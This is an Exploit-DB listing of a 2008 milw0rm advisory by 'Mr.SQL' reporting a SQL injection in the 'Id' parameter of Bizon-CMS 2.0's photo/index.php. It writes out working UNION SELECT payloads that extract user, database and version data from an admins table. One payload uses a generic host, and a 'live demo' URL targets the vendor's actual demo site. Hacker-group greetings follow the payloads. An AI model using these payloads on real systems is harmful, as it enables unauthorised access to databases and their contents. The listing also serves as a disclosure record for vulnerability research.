Bizon-CMS 2.0 - 'Id' SQL Injection

EDB-ID:

5835

CVE:

N/A


Author:

Mr.SQL

Type:

webapps


Platform:

PHP

Date:

2008-06-17


#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## Bizon-CMS V2.0 ( index.php Page )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM
##
## Email  : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS  !!
########################
########################
##
## Script   : Bizon-CMS
##
## version  : V2.0
##
## site     : www.bizon-soft.com
##
########################
########################
##
##     -(:: SQL ::)-
##
##    www.site.com/photo/
##           index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10+from+admins/*
##
##  -(:: L!VE DEMO ::)-
##
##    http://www.bizon-soft.com/bizon-cms-demo/photo/index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,@@version,current_user,database(),10+from+admins/*
##
#######################
#######################

######################################################################################################
######################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
 :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
######################################################################################################
######################################################################################################

# milw0rm.com [2008-06-17]